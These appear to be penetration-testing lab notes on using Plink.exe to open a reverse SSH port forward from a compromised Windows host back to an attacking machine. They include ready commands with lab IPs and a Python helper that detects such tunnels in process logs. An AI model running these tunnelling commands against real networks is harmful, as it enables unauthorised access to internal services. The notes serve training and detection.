Plink.exe

  • Plink is the Windows command-line version of the PuTTY SSH client.

  • Our use of Plink tends to be a case of transporting the binary to the target, then using it to create a reverse connection.

  • This would be done with the following command:

cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N
  • To use our example from before, if we have access to 172.16.0.5 and would like to forward a connection to 172.16.0.10:80 back to port 8000 on our own attacking machine (172.16.0.20), we could use this command:

cmd.exe /c echo y | .\plink.exe -R 8000:172.16.0.10:80 kali@172.16.0.20 -i KEYFILE -N
  • Note that any keys generated by ssh-keygen will not work properly here.

  • You will need to convert them using the puttygen tool, which can be installed on Kali using sudo apt install putty-tools. After downloading the tool, conversion can be done with:

puttygen KEYFILE -o OUTPUT_KEY.ppk
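
The command lines above leave a recognisable process-creation footprint: a -R forward spec, -N, and a piped "echo y" that answers the host-key prompt unseen. The following triage helper is an added example, not part of the original notes; the function names, the sample events and the svc.exe path are constructed for illustration.

```python
import re
import shlex

# -R [bind:]listen_port:dest_host:dest_port (IPv4 / hostname destinations)
FORWARD_RE = re.compile(r"^(?:[^:]+:)?(?P<listen>\d+):(?P<host>[^:]+):(?P<port>\d+)$")
# "echo y |" is only visible in the parent cmd.exe command line, not in the client's own
AUTO_ACCEPT_RE = re.compile(r"\becho\s+y\s*\|", re.IGNORECASE)
KNOWN_CLIENTS = {"plink.exe", "plink", "ssh.exe", "ssh"}

def analyze_cmdline(cmdline):
    """Return a finding dict if cmdline sets up an SSH remote forward (-R), else None."""
    stage = cmdline.split("|")[-1].strip()      # last pipeline stage runs the client
    try:
        argv = shlex.split(stage, posix=False)  # posix=False keeps Windows backslashes
    except ValueError:                          # unbalanced quotes in the log field
        argv = stage.split()
    if "-R" not in argv[1:-1]:                  # need -R followed by a forward spec
        return None
    spec = argv[argv.index("-R", 1) + 1].strip('"')
    m = FORWARD_RE.match(spec)
    if not m:
        return None
    exe = argv[0].strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()
    return {
        "binary": exe,
        "renamed": exe not in KNOWN_CLIENTS,       # arguments matched, image name did not
        "listen_port": int(m["listen"]),           # port opened on the SSH server side
        "forward_to": f'{m["host"]}:{m["port"]}',  # internal service being exposed
        "ssh_server": next((a for a in argv[1:] if "@" in a), None),
        "no_shell": "-N" in argv,
        "hostkey_auto_accepted": bool(AUTO_ACCEPT_RE.search(cmdline)),
    }

# Constructed process-creation command lines (not real telemetry)
SAMPLE_EVENTS = [
    r"cmd.exe /c echo y | .\plink.exe -R 8000:172.16.0.10:80 kali@172.16.0.20 -i KEYFILE -N",
    r'"C:\Users\Public\svc.exe" -R 9001:172.16.0.10:3389 user@172.16.0.20 -N',
    r"plink.exe -ssh admin@172.16.0.5 -batch hostname",
]

def scan(events):
    """Return findings for every event that contains a remote forward."""
    return [f for f in map(analyze_cmdline, events) if f]
```

Matching on the argument pattern rather than the image name means a renamed copy of the client is still flagged, with "renamed" set so it can be prioritised.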

Note plink.exe

  • Plink is notorious for going out of date quickly, which often results in failing to connect back. Always make sure you have an up-to-date version of the .exe. Whilst there is a copy pre-installed on Kali at /usr/share/windows-resources/binaries/plink.exe, download the latest version from:

  • https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
